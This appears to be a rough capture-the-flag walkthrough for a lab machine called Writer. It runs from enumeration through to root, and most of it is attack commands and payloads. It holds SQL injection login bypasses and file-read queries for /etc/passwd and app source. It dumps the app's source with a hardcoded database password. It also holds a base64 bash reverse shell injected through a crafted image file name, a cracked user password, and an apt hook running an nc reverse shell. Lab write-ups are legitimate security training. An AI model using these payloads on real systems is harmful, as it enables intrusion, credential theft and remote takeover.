#ENUMERATION
nmap -vvv -p 22,80,139,445 -A -v -oN intial.nmap 10.10.11.101
Looks like we have SSH,SMB and WEB. So let's start with SMB
## SMB
### Enum4linux
enum4linux 10.10.11.101
#found users { [kyle] [john] [nobody] }
smbmap -u '' -p '' -R -H 10.10 .11.101 [ Looks like annoymous login is no good as we can read any shares.]
Directory Fuzzing :: 
[ ./ffuf -u http://10.10.11.101/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c ]
#/dashboard redirects to the homepage and /about has nothing intresting.
#/contact has the form looks like a dead form which requests with the get request but give 
404 response.
#So the only good enpoint is the /administrative
Login page [ http://10.10.11.101/administrative ]
I tried doing some basic sqlinjection payload at the login form. Lets try this
[ UNAME: '||true# ] [ PASS: '|| true # ]
Payload for rquest using burpsuite [ admin' UNION ALL SELECT 0,1,2,3,4,5;.. ]
UNION ALL SELECT 0,LOAD_FILE('/ etc / passwd' ) , 2 , 3 , 4 , 5 ;
complete payload [ uname=admin' UNION ALL SELECT 0,LOAD_FILE('/etc/passwd'),2,3,4,5; --&password=admin ]
Read conf file[ uname=admin' UNION ALL SELECT 0,LOAD_FILE('/etc/apache2/sites-enabled/000-default.conf'),2,3,4,5; --&password=admin]
got [ /var/www/writer.htb/writer.wsgi ]

Welcome admin#!/usr/bin/python
import sys
import logging
import random
import os

# Define logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0,&#34;/var/www/writer.htb/&#34;)

# Import the __init__.py from the app folder
from writer import app as application
application.secret_key = os.environ.get(&#34;SECRET_KEY&#34;, &#34;&#34;)


now read init.py file [ uname=admin' UNION ALL SELECT 0,LOAD_FILE('/var/www/writer.htb/writer/__init__.py'),2,3,4,5; --&password=admin]

Welcome adminfrom flask import Flask, session, redirect, url_for, request, render_template
from mysql.connector import errorcode
import mysql.connector
import urllib.request
import os
import PIL
from PIL import Image, UnidentifiedImageError
import hashlib

app = Flask(__name__,static_url_path=&#39;&#39;,static_folder=&#39;static&#39;,template_folder=&#39;templates&#39;)

#Define connection for database
def connections():
    try:
        connector = mysql.connector.connect(user=&#39;admin&#39;, password=&#39;ToughPasswordToCrack&#39;, host=&#39;127.0.0.1&#39;, database=&#39;writer&#39;)
        return connector
    except mysql.connector.Error as err:
        if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
            return (&#34;Something is wrong with your db user name or password!&#34;)
        elif err.errno == errorcode.ER_BAD_DB_ERROR:
            return (&#34;Database does not exist&#34;)
        else:
            return (&#34;Another exception, returning!&#34;)
    else:
        print (&#39;Connection to DB is ready!&#39;)

#Define homepage
@app.route(&#39;/&#39;)
def home_page():
    try:
        connector = connections()
    except mysql.connector.Error as err:
            return (&#34;Database error&#34;)
    cursor = connector.cursor()
    sql_command = &#34;SELECT * FROM stories;&#34;
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template(&#39;blog/blog.html&#39;, results=results)

#Define about page
@app.route(&#39;/about&#39;)
def about():
    return render_template(&#39;blog/about.html&#39;)

#Define contact page
@app.route(&#39;/contact&#39;)
def contact():
    return render_template(&#39;blog/contact.html&#39;)

#Define blog posts
@app.route(&#39;/blog/post/&lt;id&gt;&#39;, methods=[&#39;GET&#39;])
def blog_post(id):
    try:
        connector = connections()
    except mysql.connector.Error as err:
            return (&#34;Database error&#34;)
    cursor = connector.cursor()
    cursor.execute(&#34;SELECT * FROM stories WHERE id = %(id)s;&#34;, {&#39;id&#39;: id})
    results = cursor.fetchall()
    sql_command = &#34;SELECT * FROM stories;&#34;
    cursor.execute(sql_command)
    stories = cursor.fetchall()
    return render_template(&#39;blog/blog-single.html&#39;, results=results, stories=stories)

#Define dashboard for authenticated users
@app.route(&#39;/dashboard&#39;)
def dashboard():
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    return render_template(&#39;dashboard.html&#39;)

#Define stories page for dashboard and edit/delete pages
@app.route(&#39;/dashboard/stories&#39;)
def stories():
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    try:
        connector = connections()
    except mysql.connector.Error as err:
            return (&#34;Database error&#34;)
    cursor = connector.cursor()
    sql_command = &#34;Select * From stories;&#34;
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template(&#39;stories.html&#39;, results=results)

@app.route(&#39;/dashboard/stories/add&#39;, methods=[&#39;GET&#39;, &#39;POST&#39;])
def add_story():
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    try:
        connector = connections()
    except mysql.connector.Error as err:
            return (&#34;Database error&#34;)
    if request.method == &#34;POST&#34;:
        if request.files[&#39;image&#39;]:
            image = request.files[&#39;image&#39;]
            if &#34;.jpg&#34; in image.filename:
                path = os.path.join(&#39;/var/www/writer.htb/writer/static/img/&#39;, image.filename)
                image.save(path)
                image = &#34;/img/{}&#34;.format(image.filename)
            else:
                error = &#34;File extensions must be in .jpg!&#34;
                return render_template(&#39;add.html&#39;, error=error)

        if request.form.get(&#39;image_url&#39;):
            image_url = request.form.get(&#39;image_url&#39;)
            if &#34;.jpg&#34; in image_url:
                try:
                    local_filename, headers = urllib.request.urlretrieve(image_url)
                    os.system(&#34;mv {} {}.jpg&#34;.format(local_filename, local_filename))
                    image = &#34;{}.jpg&#34;.format(local_filename)
                    try:
                        im = Image.open(image) 
                        im.verify()
                        im.close()
                        image = image.replace(&#39;/tmp/&#39;,&#39;&#39;)
                        os.system(&#34;mv /tmp/{} /var/www/writer.htb/writer/static/img/{}&#34;.format(image, image))
                        image = &#34;/img/{}&#34;.format(image)
                    except PIL.UnidentifiedImageError:
                        os.system(&#34;rm {}&#34;.format(image))
                        error = &#34;Not a valid image file!&#34;
                        return render_template(&#39;add.html&#39;, error=error)
                except:
                    error = &#34;Issue uploading picture&#34;
                    return render_template(&#39;add.html&#39;, error=error)
            else:
                error = &#34;File extensions must be in .jpg!&#34;
                return render_template(&#39;add.html&#39;, error=error)
        author = request.form.get(&#39;author&#39;)
        title = request.form.get(&#39;title&#39;)
        tagline = request.form.get(&#39;tagline&#39;)
        content = request.form.get(&#39;content&#39;)
        cursor = connector.cursor()
        cursor.execute(&#34;INSERT INTO stories VALUES (NULL,%(author)s,%(title)s,%(tagline)s,%(content)s,&#39;Published&#39;,now(),%(image)s);&#34;, {&#39;author&#39;:author,&#39;title&#39;: title,&#39;tagline&#39;: tagline,&#39;content&#39;: content, &#39;image&#39;:image })
        result = connector.commit()
        return redirect(&#39;/dashboard/stories&#39;)
    else:
        return render_template(&#39;add.html&#39;)

@app.route(&#39;/dashboard/stories/edit/&lt;id&gt;&#39;, methods=[&#39;GET&#39;, &#39;POST&#39;])
def edit_story(id):
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    try:
        connector = connections()
    except mysql.connector.Error as err:
            return (&#34;Database error&#34;)
    if request.method == &#34;POST&#34;:
        cursor = connector.cursor()
        cursor.execute(&#34;SELECT * FROM stories where id = %(id)s;&#34;, {&#39;id&#39;: id})
        results = cursor.fetchall()
        if request.files[&#39;image&#39;]:
            image = request.files[&#39;image&#39;]
            if &#34;.jpg&#34; in image.filename:
                path = os.path.join(&#39;/var/www/writer.htb/writer/static/img/&#39;, image.filename)
                image.save(path)
                image = &#34;/img/{}&#34;.format(image.filename)
                cursor = connector.cursor()
                cursor.execute(&#34;UPDATE stories SET image = %(image)s WHERE id = %(id)s&#34;, {&#39;image&#39;:image, &#39;id&#39;:id})
                result = connector.commit()
            else:
                error = &#34;File extensions must be in .jpg!&#34;
                return render_template(&#39;edit.html&#39;, error=error, results=results, id=id)
        if request.form.get(&#39;image_url&#39;):
            image_url = request.form.get(&#39;image_url&#39;)
            if &#34;.jpg&#34; in image_url:
                try:
                    local_filename, headers = urllib.request.urlretrieve(image_url)
                    os.system(&#34;mv {} {}.jpg&#34;.format(local_filename, local_filename))
                    image = &#34;{}.jpg&#34;.format(local_filename)
                    try:
                        im = Image.open(image) 
                        im.verify()
                        im.close()
                        image = image.replace(&#39;/tmp/&#39;,&#39;&#39;)
                        os.system(&#34;mv /tmp/{} /var/www/writer.htb/writer/static/img/{}&#34;.format(image, image))
                        image = &#34;/img/{}&#34;.format(image)
                        cursor = connector.cursor()
                        cursor.execute(&#34;UPDATE stories SET image = %(image)s WHERE id = %(id)s&#34;, {&#39;image&#39;:image, &#39;id&#39;:id})
                        result = connector.commit()

                    except PIL.UnidentifiedImageError:
                        os.system(&#34;rm {}&#34;.format(image))
                        error = &#34;Not a valid image file!&#34;
                        return render_template(&#39;edit.html&#39;, error=error, results=results, id=id)
                except:
                    error = &#34;Issue uploading picture&#34;
                    return render_template(&#39;edit.html&#39;, error=error, results=results, id=id)
            else:
                error = &#34;File extensions must be in .jpg!&#34;
                return render_template(&#39;edit.html&#39;, error=error, results=results, id=id)
        title = request.form.get(&#39;title&#39;)
        tagline = request.form.get(&#39;tagline&#39;)
        content = request.form.get(&#39;content&#39;)
        cursor = connector.cursor()
        cursor.execute(&#34;UPDATE stories SET title = %(title)s, tagline = %(tagline)s, content = %(content)s WHERE id = %(id)s&#34;, {&#39;title&#39;:title, &#39;tagline&#39;:tagline, &#39;content&#39;:content, &#39;id&#39;: id})
        result = connector.commit()
        return redirect(&#39;/dashboard/stories&#39;)

    else:
        cursor = connector.cursor()
        cursor.execute(&#34;SELECT * FROM stories where id = %(id)s;&#34;, {&#39;id&#39;: id})
        results = cursor.fetchall()
        return render_template(&#39;edit.html&#39;, results=results, id=id)

@app.route(&#39;/dashboard/stories/delete/&lt;id&gt;&#39;, methods=[&#39;GET&#39;, &#39;POST&#39;])
def delete_story(id):
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    try:
        connector = connections()
    except mysql.connector.Error as err:
            return (&#34;Database error&#34;)
    if request.method == &#34;POST&#34;:
        cursor = connector.cursor()
        cursor.execute(&#34;DELETE FROM stories WHERE id = %(id)s;&#34;, {&#39;id&#39;: id})
        result = connector.commit()
        return redirect(&#39;/dashboard/stories&#39;)
    else:
        cursor = connector.cursor()
        cursor.execute(&#34;SELECT * FROM stories where id = %(id)s;&#34;, {&#39;id&#39;: id})
        results = cursor.fetchall()
        return render_template(&#39;delete.html&#39;, results=results, id=id)

#Define user page for dashboard
@app.route(&#39;/dashboard/users&#39;)
def users():
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return &#34;Database Error&#34;
    cursor = connector.cursor()
    sql_command = &#34;SELECT * FROM users;&#34;
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template(&#39;users.html&#39;, results=results)

#Define settings page
@app.route(&#39;/dashboard/settings&#39;, methods=[&#39;GET&#39;])
def settings():
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return &#34;Database Error!&#34;
    cursor = connector.cursor()
    sql_command = &#34;SELECT * FROM site WHERE id = 1&#34;
    cursor.execute(sql_command)
    results = cursor.fetchall()
    return render_template(&#39;settings.html&#39;, results=results)

#Define authentication mechanism
@app.route(&#39;/administrative&#39;, methods=[&#39;POST&#39;, &#39;GET&#39;])
def login_page():
    if (&#39;user&#39; in session):
        return redirect(&#39;/dashboard&#39;)
    if request.method == &#34;POST&#34;:
        username = request.form.get(&#39;uname&#39;)
        password = request.form.get(&#39;password&#39;)
        password = hashlib.md5(password.encode(&#39;utf-8&#39;)).hexdigest()
        try:
            connector = connections()
        except mysql.connector.Error as err:
            return (&#34;Database error&#34;)
        try:
            cursor = connector.cursor()
            sql_command = &#34;Select * From users Where username = &#39;%s&#39; And password = &#39;%s&#39;&#34; % (username, password)
            cursor.execute(sql_command)
            results = cursor.fetchall()
            for result in results:
                print(&#34;Got result&#34;)
            if result and len(result) != 0:
                session[&#39;user&#39;] = username
                return render_template(&#39;success.html&#39;, results=results)
            else:
                error = &#34;Incorrect credentials supplied&#34;
                return render_template(&#39;login.html&#39;, error=error)
        except:
            error = &#34;Incorrect credentials supplied&#34;
            return render_template(&#39;login.html&#39;, error=error)
    else:
        return render_template(&#39;login.html&#39;)

@app.route(&#34;/logout&#34;)
def logout():
    if not (&#39;user&#39; in session):
        return redirect(&#39;/&#39;)
    session.pop(&#39;user&#39;)
    return redirect(&#39;/&#39;)

if __name__ == &#39;__main__&#39;:
   app.run(&#34;0.0.0.0&#34;)

WOAH it's a long file so let's just glaze through it and see if we can find something
intresting.
Just looking at the imported library we can see that it is importing OS so that's intresting
so just look for the instance of OS only to see if we have code execution somewhere.
Looking for os.system which basically executes the bash commands we find this piece of
code.

Generating file with malicious name
echo -n "bash -c 'bash -i >& /dev/tcp/<YOURIP>/<PORT> 0>&1'" | base64
we create jpg filewith bash reverse shell
YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTIvNDQ0NCAwPiYxJw==
touch '1.jpg; ` echo < YOUR BASE64 ENCODED PAYLOAD > | base64 -d | bash ` ;'

file:///var/www/writer.htb/writer/static/img/1.jpg; `echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTIvNDQ0NCAwPiYxJw==| base64 -d| bash `;

got kyle hash [ pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= ] [marcoantonio]
now ssh [ ssh kyle@10.10.11.101 ] [ marcoantonio ]

find / -group filters 2>/dev/null
ls -la /etc/postfix/disclaimer
cp /etc/postfix/disclaimer /home/kyle/
now i got file called "disclaimer"
now edit "Disclaimer" and put this [ bash -c 'bash -i &>/dev/tcp/<YOURIP>/<PORT> 0>&1' ]


echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.61 12345 >/tmp/f"};' > /etc/apt/apt.conf.d/oops

ssh -i kyle_idrsa john@10.10.11.101
cp disclaimer /etc/postfix/ && python3 mail2.py
#nc -nvlp 1234 listning and got shell

root flag [b3e3f578ac536c2a8b38d83fce1f556c]
user flag [bb930c9b24d21d05b36feab6b6b35708]

